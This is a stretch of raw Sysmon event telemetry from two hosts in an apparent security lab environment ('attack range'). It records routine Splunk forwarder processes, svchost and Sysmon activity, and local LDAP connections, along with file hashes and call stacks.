Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:01.512{C8EA50B7-1195-6216-0E05-000000003802}3676C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287768Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:02.543{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2C6BB51FBA836FEEA9FE9933B7474A1,SHA256=A81DC4A2ABEF855DE5573FBAD8B1EBBEC5579335BEC3C01E9A817B3F3D64CFBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216720Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:01.998{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B263372892E14A768CB672716BC2A0EF,SHA256=14EA1EE343B4D94EF9CD025FD4819C5E1A515812AEB1BE6512943C3F5D6C4C94,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287767Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:02.402{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1196-6216-0F05-000000003802}4532C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:02.402{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:02.402{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:02.402{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:02.402{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:02.402{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1196-6216-0F05-000000003802}4532C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:02.402{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1196-6216-0F05-000000003802}4532C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:02.403{C8EA50B7-1196-6216-0F05-000000003802}4532C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:03.574{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=173FAFBC5E54CA5E3CD7018F22240B6F,SHA256=8615E4FE6D7BD4F40685E7D90F9F126910D61EAC4AFE2338E514E16AC9FD1F5A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216722Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:01.503{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51344-false10.0.1.12-8000- 23542300x8000000000000000216721Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:03.186{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A5F184BD7D6D6A59EA2984D86662A6C,SHA256=507928516CE83D13ED227BD5A22F0D0C267576FD8CFBC56A07CB356029206762,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287769Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:00.578{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53443-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:04.621{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8951079D8A72F91778E158BAF2CB11EE,SHA256=3394119EF2C978A81FCE2BCBCC562551E7E55923E00C5F2C92D0075E3AA2AC72,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216723Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:04.186{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4ACA1C300BDD2BC007741D34738ABBF4,SHA256=2BCA235A6705B9816419ED8FB64E1A7C2DFF5C15D5A8CAB8F90013247960A5B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:04.168{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1198-6216-1005-000000003802}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:04.168{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:04.168{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:04.168{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:04.168{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:04.168{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1198-6216-1005-000000003802}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:04.168{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1198-6216-1005-000000003802}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:04.169{C8EA50B7-1198-6216-1005-000000003802}5660C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:05.683{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BAAE1F2A2009666917C12EF92189A9C,SHA256=67C3DA47D429A2E88D0C387D66816C2EAB97D701D16256CF0755125D09AD22F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216724Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:05.264{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F7DC715CBAB0D7E8E503C4F201B07B2,SHA256=A8C21768CE4BCC0320068C92EA2E49BEC14892DC40934C604B344F3914E8B24E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:03.188{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53444-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000287780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:03.188{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53444-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000287783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:06.699{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF9199B627A36384AE1E90C8530FE97C,SHA256=A6E0F82215E0B7D6C50E45C8F1B6A655961AB6053A8DC7E601D69445B3AA7866,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216725Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:06.296{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDAF8A1712016DB6B7070C8FB3F8685D,SHA256=402ABCC4F7BB4E5D7FDE554E42CE972A5B386984606831837741C6E8834B3DE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:07.714{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FD388F961C1699DFA51622CE17D0BB7,SHA256=5653115AFC67C53A3712C6CD0AA297DF562AE12996747936EB86630936CDF11C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216726Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:07.514{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=300D7CFEC3F0B645C8824C2FEB99940E,SHA256=BDE19BF869CB0AF9E37D046EBE53BAB688CB108CF809FA00CD567847ACCF9C24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:08.715{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C72153567688773719FCB8AF823956AD,SHA256=2FE0263D6CEC745E4B17F27CD7699B720D1EE2297AC4C8DE6945BFA2B8F692B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216728Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:06.535{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51345-false10.0.1.12-8000- 